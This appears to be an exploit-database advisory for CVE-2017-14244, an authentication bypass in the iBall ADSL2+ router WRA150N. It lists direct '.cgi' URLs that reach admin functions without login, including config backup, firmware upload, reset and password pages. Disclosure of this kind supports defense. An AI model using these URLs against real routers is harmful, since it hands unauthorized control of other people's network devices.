iBall ADSL2+ Home Router Authentication Bypass Vulnerability

2017.09.18
in Gem George (IN) in
Risk: High
Local: No
Remote: Yes
CWE: CWE-287


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability # CVE: CVE-2017-14244 # Date: 15-09-2017 # Exploit Author: Gem George # Author Contact: https://www.linkedin.com/in/gemgrge # Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746 # Firmware version: FW_iB-LR7011A_1.0.2 # Vendor Homepage: https://www.iball.co.in # Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass Vulnerability Details ====================== iBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc. How to reproduce =================== Suppose 192.168.1.1 is the router IP and one of the valid page in router is is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi Example URLs: * http://192.168.1.1/info.cgi – Status and details * http://192.168.1.1/upload.cgi – Firmware Upgrade * http://192.168.1.1/backupsettings.cgi – perform backup settings to PC * http://192.168.1.1/pppoe.cgi – PPPoE settings * http://192.168.1.1/resetrouter.cgi – Router reset * http://192.168.1.1/password.cgi – password settings POC ========= * https://www.youtube.com/watch?v=_SvrwCSdn54 -----------------------Greetz---------------------- ++++++++++++++++++ www.0seccon.com ++++++++++++++++++ Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel

References:

https://www.youtube.com/watch?v=_SvrwCSdn54


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top